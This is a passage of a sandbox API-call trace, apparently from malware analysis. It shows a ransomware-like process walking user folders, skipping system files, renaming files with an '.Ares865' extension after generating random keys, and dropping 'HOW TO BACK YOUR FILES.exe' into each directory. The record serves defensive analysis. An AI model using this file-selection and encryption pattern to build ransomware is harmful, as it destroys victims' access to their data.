szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.546] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x131b0, lpName=0x0) returned 0x124 [0106.548] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x131b0) returned 0x190000 [0106.556] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.557] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.557] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.557] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.557] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0106.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0106.558] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.558] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0106.559] CloseHandle (hObject=0x124) returned 1 [0106.559] CloseHandle (hObject=0x118) returned 1 [0106.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.559] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.560] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 0 [0106.560] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.560] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0106.560] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x328fc8 | out: hHeap=0x2b0000) returned 1 [0106.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0106.560] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned 222 [0106.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache" [0106.560] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.560] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.561] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.562] GetLastError () returned 0x0 [0106.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.562] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.562] CloseHandle (hObject=0x120) returned 1 [0106.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.562] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x4ff30900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ff30900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.562] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.563] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.563] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0x4ff30900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ff30900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.563] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.563] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.563] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.563] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.563] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AcroFnt10.lst", cAlternateFileName="ACROFN~1.LST")) returned 1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="aoldtz.exe") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2=".") returned 1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="..") returned 1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="windows") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="bootmgr") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="temp") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="pagefile.sys") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="boot") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="ids.txt") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="ntuser.dat") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="perflogs") returned -1 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2="MSBuild") returned -1 [0106.563] lstrlenW (lpString="AcroFnt10.lst") returned 13 [0106.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\*") returned 224 [0106.563] lstrcpyW (in: lpString1=0x2cce5be, lpString2="AcroFnt10.lst" | out: lpString1="AcroFnt10.lst") returned="AcroFnt10.lst" [0106.563] lstrlenW (lpString="AcroFnt10.lst") returned 13 [0106.563] lstrlenW (lpString="Ares865") returned 7 [0106.563] lstrcmpiW (lpString1="t10.lst", lpString2="Ares865") returned 1 [0106.563] lstrlenW (lpString=".dll") returned 4 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2=".dll") returned 1 [0106.563] lstrlenW (lpString=".lnk") returned 4 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2=".lnk") returned 1 [0106.563] lstrlenW (lpString=".ini") returned 4 [0106.563] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2=".ini") returned 1 [0106.564] lstrlenW (lpString=".sys") returned 4 [0106.564] lstrcmpiW (lpString1="AcroFnt10.lst", lpString2=".sys") returned 1 [0106.564] lstrlenW (lpString="AcroFnt10.lst") returned 13 [0106.564] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.Ares865") returned 244 [0106.564] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.ares865"), dwFlags=0x1) returned 1 [0106.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.566] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=53188) returned 1 [0106.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.567] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.567] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.567] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.568] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd2d0, lpName=0x0) returned 0x124 [0106.571] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd2d0) returned 0x190000 [0106.577] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.578] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.578] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0106.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x336fc8 [0106.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0710 [0106.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fc8 | out: hHeap=0x2b0000) returned 1 [0106.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2e0828 [0106.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0106.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0828 | out: hHeap=0x2b0000) returned 1 [0106.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0106.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e0710 | out: hHeap=0x2b0000) returned 1 [0106.578] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0106.579] CloseHandle (hObject=0x124) returned 1 [0106.579] CloseHandle (hObject=0x118) returned 1 [0106.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0106.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0106.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0106.579] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ff30900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ff30900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.579] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.580] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ff30900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ff30900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0106.580] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.580] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0106.580] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca068 | out: hHeap=0x2b0000) returned 1 [0106.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0106.580] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 186 [0106.580] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0106.580] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.580] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.581] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.581] GetLastError () returned 0x0 [0106.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.581] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.581] CloseHandle (hObject=0x120) returned 1 [0106.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.581] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.581] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.581] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.582] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.582] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.582] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.582] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.582] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.582] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.582] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="aoldtz.exe") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="temp") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="ntuser.dat") returned -1 [0106.582] lstrcmpiW (lpString1="Acrobat", lpString2="perflogs") returned -1 [0106.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0106.582] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x186) returned 0x31cfc8 [0106.582] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x2e77d0 [0106.582] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x70bc3940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x70bc3940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0106.582] lstrcmpiW (lpString1="Color", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.583] lstrcmpiW (lpString1="Color", lpString2="aoldtz.exe") returned 1 [0106.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0106.583] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x182) returned 0x31d160 [0106.583] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0106.583] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 